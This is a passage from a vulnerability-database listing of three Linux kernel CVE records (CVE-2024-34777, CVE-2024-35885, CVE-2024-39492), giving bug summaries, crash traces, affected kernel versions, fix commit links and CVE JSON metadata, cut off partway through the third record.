In the Linux kernel, the following vulnerability has been resolved: dma-mapping: benchmark: fix node id validation While validating node ids in map_benchmark_ioctl(), node_possible() may be provided with invalid argument outside of [0,MAX_NUMNODES-1] range leading to: BUG: KASAN: wild-memory-access in map_benchmark_ioctl (kernel/dma/map_benchmark.c:214) Read of size 8 at addr 1fffffff8ccb6398 by task dma_map_benchma/971 CPU: 7 PID: 971 Comm: dma_map_benchma Not tainted 6.9.0-rc6 #37 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) Call Trace: <TASK> dump_stack_lvl (lib/dump_stack.c:117) kasan_report (mm/kasan/report.c:603) kasan_check_range (mm/kasan/generic.c:189) variable_test_bit (arch/x86/include/asm/bitops.h:227) [inline] arch_test_bit (arch/x86/include/asm/bitops.h:239) [inline] _test_bit at (include/asm-generic/bitops/instrumented-non-atomic.h:142) [inline] node_state (include/linux/nodemask.h:423) [inline] map_benchmark_ioctl (kernel/dma/map_benchmark.c:214) full_proxy_unlocked_ioctl (fs/debugfs/file.c:333) __x64_sys_ioctl (fs/ioctl.c:890) do_syscall_64 (arch/x86/entry/common.c:83) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) Compare node ids with sane bounds first. NUMA_NO_NODE is considered a special valid case meaning that benchmarking kthreads won't be bound to a cpuset of a given node. Found by Linux Verification Center (linuxtesting.org).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/35d31c8bd4722b107…
	https://git.kernel.org/stable/c/c57874265a3c5206d…
	https://git.kernel.org/stable/c/34a816d8735f3924b…
	https://git.kernel.org/stable/c/63e7e05a48a35308a…
	https://git.kernel.org/stable/c/1ff05e723f7ca3064…

Impacted products

Vendor

Product

Version

Linux

Affected: 65789daa8087e125927230ccb7e1eab13999b0cf , < 35d31c8bd4722b107f5a2f5ddddce839de04b936 (git)
Affected: 65789daa8087e125927230ccb7e1eab13999b0cf , < c57874265a3c5206d7aece3793bb2fc9abcd7570 (git)
Affected: 65789daa8087e125927230ccb7e1eab13999b0cf , < 34a816d8735f3924b74be8e5bf766ade1f3bd10b (git)
Affected: 65789daa8087e125927230ccb7e1eab13999b0cf , < 63e7e05a48a35308aeddd7ecccb68363a5988e87 (git)
Affected: 65789daa8087e125927230ccb7e1eab13999b0cf , < 1ff05e723f7ca30644b8ec3fb093f16312e408ad (git)

Linux

Affected: 5.11
Unaffected: 0 , < 5.11 (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:59:22.204Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35d31c8bd4722b107f5a2f5ddddce839de04b936"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c57874265a3c5206d7aece3793bb2fc9abcd7570"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/34a816d8735f3924b74be8e5bf766ade1f3bd10b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63e7e05a48a35308aeddd7ecccb68363a5988e87"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ff05e723f7ca30644b8ec3fb093f16312e408ad"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34777",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:52.989247Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:44.129Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/dma/map_benchmark.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "35d31c8bd4722b107f5a2f5ddddce839de04b936",
              "status": "affected",
              "version": "65789daa8087e125927230ccb7e1eab13999b0cf",
              "versionType": "git"
            },
            {
              "lessThan": "c57874265a3c5206d7aece3793bb2fc9abcd7570",
              "status": "affected",
              "version": "65789daa8087e125927230ccb7e1eab13999b0cf",
              "versionType": "git"
            },
            {
              "lessThan": "34a816d8735f3924b74be8e5bf766ade1f3bd10b",
              "status": "affected",
              "version": "65789daa8087e125927230ccb7e1eab13999b0cf",
              "versionType": "git"
            },
            {
              "lessThan": "63e7e05a48a35308aeddd7ecccb68363a5988e87",
              "status": "affected",
              "version": "65789daa8087e125927230ccb7e1eab13999b0cf",
              "versionType": "git"
            },
            {
              "lessThan": "1ff05e723f7ca30644b8ec3fb093f16312e408ad",
              "status": "affected",
              "version": "65789daa8087e125927230ccb7e1eab13999b0cf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/dma/map_benchmark.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.11"
            },
            {
              "lessThan": "5.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma-mapping: benchmark: fix node id validation\n\nWhile validating node ids in map_benchmark_ioctl(), node_possible() may\nbe provided with invalid argument outside of [0,MAX_NUMNODES-1] range\nleading to:\n\nBUG: KASAN: wild-memory-access in map_benchmark_ioctl (kernel/dma/map_benchmark.c:214)\nRead of size 8 at addr 1fffffff8ccb6398 by task dma_map_benchma/971\nCPU: 7 PID: 971 Comm: dma_map_benchma Not tainted 6.9.0-rc6 #37\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996)\nCall Trace:\n \u003cTASK\u003e\ndump_stack_lvl (lib/dump_stack.c:117)\nkasan_report (mm/kasan/report.c:603)\nkasan_check_range (mm/kasan/generic.c:189)\nvariable_test_bit (arch/x86/include/asm/bitops.h:227) [inline]\narch_test_bit (arch/x86/include/asm/bitops.h:239) [inline]\n_test_bit at (include/asm-generic/bitops/instrumented-non-atomic.h:142) [inline]\nnode_state (include/linux/nodemask.h:423) [inline]\nmap_benchmark_ioctl (kernel/dma/map_benchmark.c:214)\nfull_proxy_unlocked_ioctl (fs/debugfs/file.c:333)\n__x64_sys_ioctl (fs/ioctl.c:890)\ndo_syscall_64 (arch/x86/entry/common.c:83)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n\nCompare node ids with sane bounds first. NUMA_NO_NODE is considered a\nspecial valid case meaning that benchmarking kthreads won\u0027t be bound to a\ncpuset of a given node.\n\nFound by Linux Verification Center (linuxtesting.org)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:05:16.688Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/35d31c8bd4722b107f5a2f5ddddce839de04b936"
        },
        {
          "url": "https://git.kernel.org/stable/c/c57874265a3c5206d7aece3793bb2fc9abcd7570"
        },
        {
          "url": "https://git.kernel.org/stable/c/34a816d8735f3924b74be8e5bf766ade1f3bd10b"
        },
        {
          "url": "https://git.kernel.org/stable/c/63e7e05a48a35308aeddd7ecccb68363a5988e87"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ff05e723f7ca30644b8ec3fb093f16312e408ad"
        }
      ],
      "title": "dma-mapping: benchmark: fix node id validation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-34777",
    "datePublished": "2024-06-21T11:18:45.481Z",
    "dateReserved": "2024-06-21T11:16:40.638Z",
    "dateUpdated": "2025-05-04T09:05:16.688Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35885 (GCVE-0-2024-35885)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

mlxbf_gige: stop interface during shutdown

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxbf_gige: stop interface during shutdown The mlxbf_gige driver intermittantly encounters a NULL pointer exception while the system is shutting down via "reboot" command. The mlxbf_driver will experience an exception right after executing its shutdown() method. One example of this exception is: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000070 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=000000011d373000 [0000000000000070] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 96000004 [#1] SMP CPU: 0 PID: 13 Comm: ksoftirqd/0 Tainted: G S OE 5.15.0-bf.6.gef6992a #1 Hardware name: https://www.mellanox.com BlueField SoC/BlueField SoC, BIOS 4.0.2.12669 Apr 21 2023 pstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige] lr : mlxbf_gige_poll+0x54/0x160 [mlxbf_gige] sp : ffff8000080d3c10 x29: ffff8000080d3c10 x28: ffffcce72cbb7000 x27: ffff8000080d3d58 x26: ffff0000814e7340 x25: ffff331cd1a05000 x24: ffffcce72c4ea008 x23: ffff0000814e4b40 x22: ffff0000814e4d10 x21: ffff0000814e4128 x20: 0000000000000000 x19: ffff0000814e4a80 x18: ffffffffffffffff x17: 000000000000001c x16: ffffcce72b4553f4 x15: ffff80008805b8a7 x14: 0000000000000000 x13: 0000000000000030 x12: 0101010101010101 x11: 7f7f7f7f7f7f7f7f x10: c2ac898b17576267 x9 : ffffcce720fa5404 x8 : ffff000080812138 x7 : 0000000000002e9a x6 : 0000000000000080 x5 : ffff00008de3b000 x4 : 0000000000000000 x3 : 0000000000000001 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige] mlxbf_gige_poll+0x54/0x160 [mlxbf_gige] __napi_poll+0x40/0x1c8 net_rx_action+0x314/0x3a0 __do_softirq+0x128/0x334 run_ksoftirqd+0x54/0x6c smpboot_thread_fn+0x14c/0x190 kthread+0x10c/0x110 ret_from_fork+0x10/0x20 Code: 8b070000 f9000ea0 f95056c0 f86178a1 (b9407002) ---[ end trace 7cc3941aa0d8e6a4 ]--- Kernel panic - not syncing: Oops: Fatal exception in interrupt Kernel Offset: 0x4ce722520000 from 0xffff800008000000 PHYS_OFFSET: 0x80000000 CPU features: 0x000005c1,a3330e5a Memory Limit: none ---[ end Kernel panic - not syncing: Oops: Fatal exception in interrupt ]--- During system shutdown, the mlxbf_gige driver's shutdown() is always executed. However, the driver's stop() method will only execute if networking interface configuration logic within the Linux distribution has been setup to do so. If shutdown() executes but stop() does not execute, NAPI remains enabled and this can lead to an exception if NAPI is scheduled while the hardware interface has only been partially deinitialized. The networking interface managed by the mlxbf_gige driver must be properly stopped during system shutdown so that IFF_UP is cleared, the hardware interface is put into a clean state, and NAPI is fully deinitialized.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/63a10b530e22cc923…
	https://git.kernel.org/stable/c/80247e0eca14ff177…
	https://git.kernel.org/stable/c/36a1cb0371aa6f069…
	https://git.kernel.org/stable/c/9783b3b0e71d70494…
	https://git.kernel.org/stable/c/09ba28e1cd3cf715d…

Impacted products

Vendor

Product

Version

Linux

Affected: f92e1869d74e1acc6551256eb084a1c14a054e19 , < 63a10b530e22cc923008b5925821c26872f37971 (git)
Affected: f92e1869d74e1acc6551256eb084a1c14a054e19 , < 80247e0eca14ff177d565f58ecd3010f6b7910a4 (git)
Affected: f92e1869d74e1acc6551256eb084a1c14a054e19 , < 36a1cb0371aa6f0698910ee70cb4ed3c349f4fa4 (git)
Affected: f92e1869d74e1acc6551256eb084a1c14a054e19 , < 9783b3b0e71d704949214a8f76468f591a31f3f5 (git)
Affected: f92e1869d74e1acc6551256eb084a1c14a054e19 , < 09ba28e1cd3cf715daab1fca6e1623e22fd754a6 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35885",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:11:55.857158Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:36.685Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.190Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63a10b530e22cc923008b5925821c26872f37971"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80247e0eca14ff177d565f58ecd3010f6b7910a4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/36a1cb0371aa6f0698910ee70cb4ed3c349f4fa4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9783b3b0e71d704949214a8f76468f591a31f3f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09ba28e1cd3cf715daab1fca6e1623e22fd754a6"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "63a10b530e22cc923008b5925821c26872f37971",
              "status": "affected",
              "version": "f92e1869d74e1acc6551256eb084a1c14a054e19",
              "versionType": "git"
            },
            {
              "lessThan": "80247e0eca14ff177d565f58ecd3010f6b7910a4",
              "status": "affected",
              "version": "f92e1869d74e1acc6551256eb084a1c14a054e19",
              "versionType": "git"
            },
            {
              "lessThan": "36a1cb0371aa6f0698910ee70cb4ed3c349f4fa4",
              "status": "affected",
              "version": "f92e1869d74e1acc6551256eb084a1c14a054e19",
              "versionType": "git"
            },
            {
              "lessThan": "9783b3b0e71d704949214a8f76468f591a31f3f5",
              "status": "affected",
              "version": "f92e1869d74e1acc6551256eb084a1c14a054e19",
              "versionType": "git"
            },
            {
              "lessThan": "09ba28e1cd3cf715daab1fca6e1623e22fd754a6",
              "status": "affected",
              "version": "f92e1869d74e1acc6551256eb084a1c14a054e19",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxbf_gige: stop interface during shutdown\n\nThe mlxbf_gige driver intermittantly encounters a NULL pointer\nexception while the system is shutting down via \"reboot\" command.\nThe mlxbf_driver will experience an exception right after executing\nits shutdown() method.  One example of this exception is:\n\nUnable to handle kernel NULL pointer dereference at virtual address 0000000000000070\nMem abort info:\n  ESR = 0x0000000096000004\n  EC = 0x25: DABT (current EL), IL = 32 bits\n  SET = 0, FnV = 0\n  EA = 0, S1PTW = 0\n  FSC = 0x04: level 0 translation fault\nData abort info:\n  ISV = 0, ISS = 0x00000004\n  CM = 0, WnR = 0\nuser pgtable: 4k pages, 48-bit VAs, pgdp=000000011d373000\n[0000000000000070] pgd=0000000000000000, p4d=0000000000000000\nInternal error: Oops: 96000004 [#1] SMP\nCPU: 0 PID: 13 Comm: ksoftirqd/0 Tainted: G S         OE     5.15.0-bf.6.gef6992a #1\nHardware name: https://www.mellanox.com BlueField SoC/BlueField SoC, BIOS 4.0.2.12669 Apr 21 2023\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\nlr : mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\nsp : ffff8000080d3c10\nx29: ffff8000080d3c10 x28: ffffcce72cbb7000 x27: ffff8000080d3d58\nx26: ffff0000814e7340 x25: ffff331cd1a05000 x24: ffffcce72c4ea008\nx23: ffff0000814e4b40 x22: ffff0000814e4d10 x21: ffff0000814e4128\nx20: 0000000000000000 x19: ffff0000814e4a80 x18: ffffffffffffffff\nx17: 000000000000001c x16: ffffcce72b4553f4 x15: ffff80008805b8a7\nx14: 0000000000000000 x13: 0000000000000030 x12: 0101010101010101\nx11: 7f7f7f7f7f7f7f7f x10: c2ac898b17576267 x9 : ffffcce720fa5404\nx8 : ffff000080812138 x7 : 0000000000002e9a x6 : 0000000000000080\nx5 : ffff00008de3b000 x4 : 0000000000000000 x3 : 0000000000000001\nx2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000\nCall trace:\n mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\n mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\n __napi_poll+0x40/0x1c8\n net_rx_action+0x314/0x3a0\n __do_softirq+0x128/0x334\n run_ksoftirqd+0x54/0x6c\n smpboot_thread_fn+0x14c/0x190\n kthread+0x10c/0x110\n ret_from_fork+0x10/0x20\nCode: 8b070000 f9000ea0 f95056c0 f86178a1 (b9407002)\n---[ end trace 7cc3941aa0d8e6a4 ]---\nKernel panic - not syncing: Oops: Fatal exception in interrupt\nKernel Offset: 0x4ce722520000 from 0xffff800008000000\nPHYS_OFFSET: 0x80000000\nCPU features: 0x000005c1,a3330e5a\nMemory Limit: none\n---[ end Kernel panic - not syncing: Oops: Fatal exception in interrupt ]---\n\nDuring system shutdown, the mlxbf_gige driver\u0027s shutdown() is always executed.\nHowever, the driver\u0027s stop() method will only execute if networking interface\nconfiguration logic within the Linux distribution has been setup to do so.\n\nIf shutdown() executes but stop() does not execute, NAPI remains enabled\nand this can lead to an exception if NAPI is scheduled while the hardware\ninterface has only been partially deinitialized.\n\nThe networking interface managed by the mlxbf_gige driver must be properly\nstopped during system shutdown so that IFF_UP is cleared, the hardware\ninterface is put into a clean state, and NAPI is fully deinitialized."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:35.129Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/63a10b530e22cc923008b5925821c26872f37971"
        },
        {
          "url": "https://git.kernel.org/stable/c/80247e0eca14ff177d565f58ecd3010f6b7910a4"
        },
        {
          "url": "https://git.kernel.org/stable/c/36a1cb0371aa6f0698910ee70cb4ed3c349f4fa4"
        },
        {
          "url": "https://git.kernel.org/stable/c/9783b3b0e71d704949214a8f76468f591a31f3f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/09ba28e1cd3cf715daab1fca6e1623e22fd754a6"
        }
      ],
      "title": "mlxbf_gige: stop interface during shutdown",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35885",
    "datePublished": "2024-05-19T08:34:41.873Z",
    "dateReserved": "2024-05-17T13:50:33.112Z",
    "dateUpdated": "2025-05-04T09:07:35.129Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-39492 (GCVE-0-2024-39492)

Vulnerability from cvelistv5 – Published: 2024-07-10 07:14 – Updated: 2025-05-04 09:16

Title

mailbox: mtk-cmdq: Fix pm_runtime_get_sync() warning in mbox shutdown

Summary

In the Linux kernel, the following vulnerability has been resolved: mailbox: mtk-cmdq: Fix pm_runtime_get_sync() warning in mbox shutdown The return value of pm_runtime_get_sync() in cmdq_mbox_shutdown() will return 1 when pm runtime state is active, and we don't want to get the warning message in this case. So we change the return value < 0 for WARN_ON().

Severity ?

7 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-252 - Unchecked Return Value

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2d42a37a4518478f0…
	https://git.kernel.org/stable/c/747a69a119c469121…

Impacted products

Vendor

Product

Version

Linux

Affected: 8afe816b0c9944a11adb12628e3b700a08a55d52 , < 2d42a37a4518478f075ccf848242b4a50e313a46 (git)
Affected: 8afe816b0c9944a11adb12628e3b700a08a55d52 , < 747a69a119c469121385543f21c2d08562968ccc (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-39492",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-10T14:25:55.752638Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-252",
                "description": "CWE-252 Unchecked Return Value",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-30T20:34:15.462Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.418Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d42a37a4518478f075ccf848242b4a50e313a46"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/747a69a119c469121385543f21c2d08562968ccc"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/mailbox/mtk-cmdq-mailbox.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2d42a37a4518478f075ccf848242b4a50e313a46",
              "status": "affected",
              "version": "8afe816b0c9944a11adb12628e3b700a08a55d52",
              "versionType": "git"
            },
            {
              "lessThan": "747a69a119c469121385543f21c2d08562968ccc",
              "status": "affected",
              "version": "8afe816b0c9944a11adb12628e3b700a08a55d52",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/mailbox/mtk-cmdq-mailbox.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
